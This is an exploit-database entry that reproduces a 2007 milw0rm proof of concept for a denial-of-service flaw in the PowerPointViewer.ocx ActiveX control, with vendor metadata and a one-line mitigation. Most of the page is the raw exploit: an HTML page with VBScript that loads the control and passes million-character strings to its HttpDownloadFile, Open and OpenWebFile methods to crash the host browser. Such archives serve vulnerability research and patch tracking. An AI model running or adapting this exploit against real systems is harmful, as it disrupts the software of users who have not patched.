header-logo
Suggest Exploit
vendor:
PowerPointViewer.ocx
by:
shinnai
N/A
CVSS
N/A
Denial of Service
CWE
Product Name: PowerPointViewer.ocx
Affected Version From: 3.1.0.3
Affected Version To: Unknown
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7
2007

PowerPointViewer.ocx v. 3.1.0.3 multiple methods Denial of Service

The PowerPointViewer.ocx version 3.1.0.3 is vulnerable to multiple methods denial of service. The vulnerable methods are DoOleCommand, FTPDownloadFile, FTPUploadFile, HttpUploadFile, Save, and SaveWebFile.

Mitigation:

Update the software to the latest version.
Source

Exploit-DB raw data:

<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/01</b></p></span>
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 <b>PowerPointViewer.ocx v. 3.1.0.3 multiple methods Denial of Service</b>
 url: http://www.officeocx.com/
 price: from €63.95 (update to last version) to €1,585.95 (Royalty)

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to these exploits.
 Theese methods are vulnerable too:

 <b>DoOleCommand</b>
 <b>FTPDownloadFile</b>
 <b>FTPUploadFile</b>
 <b>HttpUploadFile</b>
 <b>Save</b>
 <b>SaveWebFile</b>
-----------------------------------------------------------------------------

<object classid='clsid:97AF4A45-49BE-4485-9F55-91AB40F22B92' id='PowerPointOCX' width="405" height="50"></object>

<select style="width: 404px" name="Pucca">
  <option value = "HttpDownloadFile">HttpDownloadFile</option>
  <option value = "Open">Open</option>
  <option value = "OpenWebFile">OpenWebFile</option>
  <option value = "Quoting">Quoting...</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "HttpDownloadFile" then
     argCount = 2
     arg1=String(1000000,"A")
     arg2="defaultV"
     PowerPointOCX.HttpDownloadFile arg1, arg2
   elseif Pucca.value = "Open" then
     argCount = 1
     arg1=String(1000000, "A")
     PowerPointOCX.Open arg1
   elseif Pucca.value = "OpenWebFile" then
     argCount = 1
     arg1=String(1000000, "A")
     PowerPointOCX.OpenWebFile arg1
   else
     MyMsg = MsgBox ("...And when he knew for certain" & vbCrLf &_
     "Only drowning men could see him" & vbCrLf &_
     "He said: 'All men will be sailors then" & vbCrLf &_
     "Until the sea shall free them'...",64 ,"2007/05/01 - PowerPointViewer 3.1")
   end if
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-01]

Navigation

Suggest Exploit

Services By CQR